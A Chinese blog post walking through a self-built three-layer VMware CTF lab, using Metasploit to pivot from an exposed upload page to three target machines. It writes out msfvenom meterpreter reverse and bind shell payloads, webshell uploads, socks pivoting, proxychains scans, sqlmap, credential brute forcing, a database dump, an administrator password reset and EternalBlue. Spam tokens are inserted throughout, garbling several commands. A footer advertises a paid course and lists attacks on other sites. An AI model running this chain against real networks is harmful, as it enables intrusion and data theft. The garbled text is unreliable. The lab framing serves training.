网络安全攻防靶场（三层网络靶场搭建&MSF内网渗透）

php教程 百度网盘

在最近的CTF比赛中，综合靶场出现的次数越来越多，这种形式的靶场和真实的内网渗透很像，很贴合实际工作，但我们往往缺少多层网络的练习环境本文通过VMware搭建3层网络，并通过msf资源网进行内网渗透，涉及代理搭建，流量转发，端口映射等常见内网渗透技术。

网络拓扑

环境搭建首先在虚拟机中新建3块网卡，选择仅主机模式

将kali设为第一层网络vmnet1

将第一层靶机设为双网卡vmnet1和vm资源网net2

将第二层靶机设置为双网卡：vmnet2和vmnet3：

将第三层靶机设为vmnet3：

至此，我们的3层网络环境就已经搭建完毕。第一层靶机Nmap探测一下，发现8080端口：

访问一下：

返现文件上传资源网点，经测试没有任何过滤，可以直接上传任意文件，因此直接上传jsp一句话后门：

上传后返回文件路径，菜刀连接：

为了进一步做内网渗透，上传msf后门：1、后门制作：msfvenom -p linux/x64资源网/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpira资源网tionTimeout=0 -f elf >shell.elf

将shell.elf上传到第一层靶机192.168.59.1292、MSF设置监听：

3、在第一层靶机运行shell.elfChmod 77资源网7 shell.elf./shell.elf4、Msf获得meterpreter，执行shell，查看网络配置，发现双网卡，第二层网络段为192.168.80.0/24

第二层靶机首先利用第一层的met资源网erpreter添加到第二层的路由：run autoroute -s 192.168.80.0/24

然后利用msf进行第二层网络存活主机扫描：use auxiliary/scanner/discove资源网ry/arp_sweep

发现第二层靶机 192.168.80.129。接着利用msf搭建socks代理，好让攻击机直接打第二层网络：use auxiliary/server/socks4a

然后在第一层资源网网络配置相关socks4代理客户端：Proxychain:在配置文件/etc/proxychains.conf中添加：socks4 192.168.59.128 9999然后利用proxychans 资源网启动nmap对第二层靶机进行扫描，这里注意一定要加上-Pn和-sT参数：

proxychains nmap -Pn -sT 192.168.80.129 -p1-1000

发现第二层主机开放22和80端口资源网。在Chrome中配置代理

访问第二层网络：

是一个typecho的 cms，尝试admin/admin等弱口令登陆后台，登陆成功：

个人信息处发现flag：

在设置中允许上传php

然后撰写文章，附件上传ph资源网p webshell：

可以看到 shell 路径，用蚁剑连接，因为是第二层网络，所以得通过socks代理客户端去启动蚁剑，我用的是sockscap64：

在代理中配置代理服务器：

用蚁剑连接shell：

在资源网网站根目录处发现flag查看config.inc.php:

发现数据库口令123：将数据库dump出来：mysqldump -uroot -p123 typecho >/tmp/1.sql在1.sql中资源网发现flag：

第二层靶机还开放了22端口，尝试利用msf、hydra探测一下弱口令：Hydra：

Msf：use auxiliary/scanner/ssh/ssh_login

同样发现弱口令，同时msf资源网可以直接获得一个meterpreter

获得flag:

在sockscap64中打开ssh客户端：

也可以利用root/123456登录，获得flag

同样，为了打进第三层，我们需要在第二层靶机上上传msf后资源网门，制作后门：msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4321 -f elf > shell1.elf

利用蚁剑上传，并在第二层靶机运行：Chm资源网od 777 ./shell1.elf./shell1.elf在msf上配置payload：

获得第二层meterpreter：

发现第三层网段192.168.226.0/24

然后利用这个meterpre资源网ter添加到第三层的网络路由：run autoroute -s 192.168.226.0/24

在启用一个socks代理给第三层网络，端口开9998

然后在proxychains的配置文件中加上9998资源网：

扫描一下第三层主机端口：proxychains nmap -Pn -sT 192.168.226.129 -p1-1000

发现开放了80、445端口第三层网络在chrome 修改代理，端口改为999资源网8

访问第三层网络

查询处存在 SQL 注入

抓包：

Proxychains 跑sqlmapproxychains sqlmap -r test.txt

得到后台用户密码：admin/faka123

登录：

发现f资源网lag。接着在logo上传处发现任意文件上传：

直接上传木马，获得路径：

菜刀连接，网站根目录发现flag

发现网站开启了3389，同时是system权限：

直接修改administrator密码：net u资源网ser administrator 123456再把第三层3389流量转发到代理服务器中：

访问远程桌面：

发现flag：

同时，该靶机开放445端口，试试永痕之蓝：

同样可以拿到shell至此，我们已经拿下资源网3层网络中的全部机器本文来源：码农网本文链接：https://www.codercto.com/a/62065.html———————【2022HW系列】|10-一次某次攻防演练种的分析溯源。

【202资源网2HVV系列】|9-红蓝对抗-红队打点的那些事【2022HVV系列】|8-应急响应之入侵排查【2022HVV系列】|7-Windows主机入侵痕迹排查办法【2022HVV系列】|6-记一次hw中的上线资源网骚姿势（异速联+用友U8）

【2022HVV系列】|5-记一次溯源过程【2022HVV系列】|4-红蓝对抗 | 红队打点的那些事【2022HVV系列】|3-服务器入侵排查【2022HVV系列】| 2-应资源网急响应常用工具【2022HVV系列】| 1-应急响应方法论思维导图

————————————————【Hacking黑白红】，一线渗透攻防实战交流公众号

回复“电子书”获取web渗透、CTF电子书:回复“资源网视频教程”获取渗透测试视频教程;  回复“内网书籍”获取内网学习书籍;        回复“CTF工具”获取渗透、CTF全套工具;回复“内网渗透”；获取内网渗透资料;

回复“护网”；获取护网学习资料 ;资源网回复“python”,获取python视频教程；回复“java”，获取Java视频教程;回复“go”，获取go视频教程知识星球【Hacking藏经阁】知识星球致力于分享

技术和认知1、技术方面主攻渗透测资源网试（web和内网）、CTF比赛、逆向、护网行动等；400G渗透教学视频、80多本安全类电子书、50个渗透靶场（资料主要来自本人总结、以及学习过程中购买的课程）2、认知方面。

副业经营、人设IP打造，具体资源网点公众号运营、抖*yin等自媒体运营（目前主要在运营两个平台4个号）。如果你也想像我一样，不想35岁以后被动的去面试，那么加入星球我们一起成长。

欢迎加入99米/年，平均每天2毛7分钱，学习网络安全一整资源网年。

渗透实战系列▶【渗透实战系列】|46-渗透测试：从Web到内网▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell▶【渗透实战系列】|44-记一次授权渗透实战（过程曲折，Java 资源网getshell）

▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享▶【渗透实战系列】|42-防范诈骗，记一次帮助粉丝渗透黑入某盘诈骗的实战▶【渗透实战系列】|41-记一次色*情app渗透测试▶【渗资源网透实战系列】|40-APP渗透测试步骤（环境、代理、抓包挖洞）

▶【渗透实战系列】|39-BC渗透的常见切入点（总结）▶【渗透实战系列】|38-对某色情直播渗透▶【渗透实战系列】|37-6年级小学生把学资源网校的网站给搞了！▶【渗透实战系列】|36-一次bc推广渗透实战▶

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透▶【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链▶【渗透实战系列】|3资源网3-App渗透 ,由sql注入、绕过人脸识别、成功登录APP▶【渗透实战系列】|32-FOFA寻找漏洞，绕过杀软拿下目标站

▶【渗透实战系列】|31-记一次对学校的渗透测试▶【渗透实战系列】|30-从S资源网QL注入渗透内网（渗透的本质就是信息搜集）▶【渗透实战系列】|29-实战|对某勒索APP的Getshell▶【渗透实战系列】|28-我是如何拿下BC站的服务器

▶【渗透实战系列】|27-对钓鱼诈骗网站的资源网渗透测试（成功获取管理员真实IP）▶【渗透实战系列】|26一记某cms审计过程(步骤详细)▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

▶【渗透实战系列】|24-针对CMS的资源网SQL注入漏洞的代码审计思路和方法▶【渗透实战系列】|23-某菠菜网站渗透实战▶【渗透实战系列】|22-渗透系列之打击彩票站▶【渗透实战系列】|21一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|20-资源网渗透直播网站▶【渗透实战系列】|19-杀猪盘渗透测试▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息（漏洞已提交）▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell

▶【渗透资源网实战系列】|16-裸聊APP渗透测试▶【渗透实战系列】|15-博彩网站（APP）渗透的常见切入点▶【渗透实战系列】|14-对诈骗（杀猪盘）网站的渗透测试▶【渗透实战系列】|13-waf绕过拿下赌博网站资源网

▶【渗透实战系列】|12 -渗透实战， 被骗4000花呗背后的骗局▶【渗透实战系列】|11 - 赌博站人人得而诛之▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖（修改价格提交订单）▶【渗资源网透实战系列】|9-对境外网站开展的一次web渗透测试（非常详细，适合打战练手）

▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程（详细到无语）▶【渗透实战系列】|7-记一次理财杀猪盘资源网渗透测试案例▶【渗透实战系列】|6- BC杀猪盘渗透一条龙▶【渗透实战系列】|5-记一次内衣网站渗透测试

▶【渗透实战系列】|4-看我如何拿下BC站的服务器▶【渗透实战系列】|3-一次简单的渗透▶【渗透资源网实战系列】|2-记一次后门爆破到提权实战案例▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战（getshell并获得全部数据）

长按-识别-关注

Hacking黑白红一个专注信息安全技术的学习平台

点资源网分享

点收藏

点点赞

点在看

亲爱的读者们，感谢您花时间阅读本文。如果您对本文有任何疑问或建议，请随时联系我。我非常乐意与您交流。